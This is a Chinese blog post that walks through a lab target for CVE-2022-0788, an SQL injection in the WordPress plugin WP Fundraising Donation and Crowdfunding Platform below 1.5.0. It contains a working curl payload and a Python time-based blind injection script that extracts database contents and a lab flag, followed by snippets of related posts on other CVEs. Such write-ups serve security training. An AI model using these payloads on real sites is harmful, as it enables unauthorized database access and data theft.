春秋云镜 CVE-2022-0788

最新推荐文章于 2025-05-16 15:20:27 发布
最新推荐文章于 2025-05-16 15:20:27 发布
阅读量747 收藏
点赞数 1
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_22002773/article/details/132364934
版权
文章描述了WordPress插件WPFundraisingDonationandCrowdfundingPlatform1.5.0版本中的SQL注入漏洞,攻击者可通过REST路由未过滤的参数执行SQL命令。提供了一个利用脚本演示了如何通过时间盲注入法获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

春秋云镜 CVE-2022-0788 wordpress插件 WP Fundraising Donation and Crowdfunding Platform < 1.5.0 SQLI

靶标介绍

wordpress插件 WP Fundraising Donation and Crowdfunding Platform < 1.5.0 的其中一个REST路由在SQL语句使用时没有对参数进行过滤,导致SQL注入漏洞。

启动场景

在这里插入图片描述

漏洞利用

exp

curl 'https://example.com/index.php?rest_route=/xs-donate-form/payment-redirect/3' \
    --data '{"id": "(SELECT 1 FROM (SELECT(SLEEP(5)))me)", "formid": "1", "type": "online_payment"}' \
    -X GET \
    -H 'Content-Type: application/json'

找了个大佬写的脚本

https://www.cnblogs.com/upfine/p/17637840.html

import requests
import time

def time_delay(url, payload,headers):
    start_time = time.time()
    response = requests.get(url, data=payload,headers=headers)
    end_time = time.time()
    delay = end_time - start_time
    return delay

def time_based_blind_sql_injection(url,headers):
    result = []
    for i in range(1, 100):
        for j in range(32, 126):  # r'0123456789abcdefghijklmnopqrstuvwxyz_-{}':
            # find db ctfJ
            payload = '{"id": "(SELECT 1 FROM (SELECT(SLEEP( (if(ascii(substr(database(),'+str(i)+',1))='+str(j)+',sleep(2),1)))))me)", "formid": "1", "type": "online_payment"}'
            # find table
            payload = '{"id": "(SELECT 1 FROM (SELECT(SLEEP( (if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),' + str(i) + ',1))=' + str(102) + ',sleep(2),1)))))me)", "formid": "1", "type": "online_payment"}'
            payload = '{"id": "(SELECT 1 FROM (SELECT(SLEEP( (if(ascii(substr((select flag from flag limit 0,1),' + str(i) + ',1))=' + str(j) + ',sleep(2),1)))))me)", "formid": "1", "type": "online_payment"}'

            delay = time_delay(url, payload,headers)
            print('{ ', ''.join(result), ' } ->', i, '-', j, "time_delay:", delay)
            if delay > 2:
                result.append(chr(j))
                print(''.join(result))
                break
    else:
        print("The payload is not vulnerable to SQL injection.")
    print('result:', ''.join(result))

if __name__ == "__main__":
    url = "http://eci-2zehgubmr60nhm5swagf.cloudeci1.ichunqiu.com/index.php?rest_route=/xs-donate-form/payment-redirect/3"
    headers = {'Content-Type': 'application/json'}
    time_based_blind_sql_injection(url,headers)

在这里插入图片描述

得到flag

flag{58f06264-30a7-4cc6-bfb2-0928024a6788}

CVE-2022-0778严重漏洞解决方案
开源中国
03-17 1万+
以下是从Red Hat官网上找到的关于OpenSSL的安全缺陷,详细请读下面链接: CVE-2022-0778- 红帽客户门户 (redhat.com)https://access.redhat.com/security/cve/cve-2022-0778 描述 在OpenSSL中发现了一个缺陷。可以通过制作具有无效显式曲线参数的证书来触发无限循环。由于证书解析发生在验证证书签名之前,因此解析外部提供的证书的任何进程都可能受到拒绝服务攻击。 我目前的Centos操作系统的版本是Centos7.9
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1737
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
OPEN SSL 漏洞 CVE-2022-0778
wangbaosongmsn的博客
06-20 866
openssl 漏洞
OpenSSL拒绝服务漏洞(CVE-2022-0778)的升级
大宇进阶之路的博客
06-24 5389
系统扫描时有一个mysql的漏洞: Oracle MySQL/MariaDB 全漏洞(CVE-2022-0778)但实际是openssl服务的漏洞,OpenSSL 项目组于 2022 年 3 月 15 日发布安全公告披露 CVE-2022-0778 号漏洞,该漏洞严重性为高,CVSS 评分 7.5 分/ 10 分。升级:OpenSSL 1.0.2 版用户应升级到 1.0.2zd 版(仅限高级支持客户)、OpenSSL 1.1.1 版用户应升级到 1.1.1n 版、OpenSSL 3.0 版用户应升级到 3.
春秋 CVE-2022-30887wp】
风依旧的博客
10-18 4110
春秋 CVE-2022-30887 WP
[CVE-2022-0778]OpenSSL拒绝服务漏洞分析
whoami
03-16 2417
一、背景 OpenSSL 是一个安全套接字层密码库,囊括主要的密码算法、常用的密钥和证书封装管理功能及SSL协议,并提供丰富的应用程序供测试或其它目的使用。 该漏洞由于计算模平方根的 BN_mod_sqrt() 函数错误导致,该错误可能导致它对于非素数模数无限循环,最终导致拒绝服务。 二、漏洞分析 查看openssl官方最近的一次漏洞修复commit记录: Fix possible infinite loop in BN_mod_sqrt() · openssl/openssl@3118eb6
Linux内核提权漏洞—CVE-2022-0874 复现
weixin_48421613的博客
03-08 977
官方漏洞通告: https://access.redhat.com/security/cve/cve-2022-0847 受影响的版本: 5.8<=Linux kernel<5.16.11/5.15.25/5.10.102​ ​ 复现过程如下: 首先我的exp是在github上下载的 https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit. 访问不了的可以公众号回复 0005即可获取exp 我这里使用的测试机器是kali2022
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 762
春秋CVE-2022-32991 Web Based Quiz System SQL注入
春秋CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2692
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
记录春秋CVE-2022-32991复现过程
as_adwd的博客
03-19 342
个人记录(新手小白)春秋CVE的复现过程
OPENSSL拒绝服务漏洞【CVE-2022-0778】
Armandhe的博客
03-18 2465
OPENSSL拒绝服务漏洞【CVE-2022-0778】
CVE-2022-30887漏洞复现
weixin_45177807的博客
11-06 2467
CVE-2022-30887漏洞复现
wordpress插件_您应该知道的2018年10个高级WordPress插件
cune1359的博客
07-03 553
必须明智地选择WordPress插件。 它可以确保您的WordPress网站性能最佳。 您正在构建的网站也将这样做。 您可以为访问者提供他们想要的确切信息。 这样,您正在为客户,网站用户以及您自己创造双赢局面。 WordPress插件提供了一种添加或扩展WordPress功能的好方法。 因此,他们可以为您的网站做同样的事情。 在本文中,您将找到10个WordPress插件,这些插件构成...
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 294
shiro550反序列化
安全巡检清单
yh
05-15 879
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
安全版4.5.8开启审计后,hac+读写分离主备切换异常
HighGO
05-16 222
异常:hac集群一主两备环境,开启hgproxy和审计功能后,进行集群主备切换操作。切换过程持续近5分钟,主库方可切换到备节点上,其中未参与切换(原主与新主外的备节点)的备库无法拉起,持续restarting状态很长时间后start failed。解决此问题的安装包:hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包: hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案:关闭审计功能,修改审计参数后需要重启集群。系统平台:UOS (飞腾)
AI智能分析网关V4周界入侵检测算法精准监测与智能分析,筑牢周界安全防线
NVR安防视频技术
05-14 533
随着安全防范需求的不断提升,传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题,难以满足现代化安全管理的要求。
中大型水闸安全监测系统解决方案
最新发布
weixin_48039531的博客
05-16 426
然而,由于历史原因,许多水闸存在建设标准偏低、质量较差、配套设施不完善等问题,加之受“重建轻管”思想影响,多数水闸建成后缺乏有效的管理和维修养护,存在较多的安全隐患,安全运行风险突出。现代化的水闸安全监测系统不仅能够实现实时监测、数据分析、预警报警等功能,还能够通过三维可视化技术,实现水闸运行状态、水流情况、水位变化等数据的直观展示,为管理决策提供更加科学、准确的依据。通过实时监控水闸的结构状态、水文数据和环境变化,可以及时发现潜在的风险和问题,从而采取相应的预防措施,确保水闸的稳定性和耐久性。
春秋CVE-2022-0543
09-04
根据提供的引用内容,春秋CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来修复这个漏洞,并提供了相关链接供参考。 另外,引用中还提供了一个链接,指向一个网址http://eci-2zej5zymcbcri9jmain3.cloudeci1.ichunqiu.com/,但无法确定这个链接与CVE-2022-0543之间的具体关系。 引用中还展示了一个尝试读取系统文件的HTTP请求,但同样无法确定这个请求与CVE-2022-0543之间的具体关系。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.youkuaiyun.com/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [[春秋]CVE-2022-0543](https://blog.youkuaiyun.com/niubi707/article/details/128305838)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值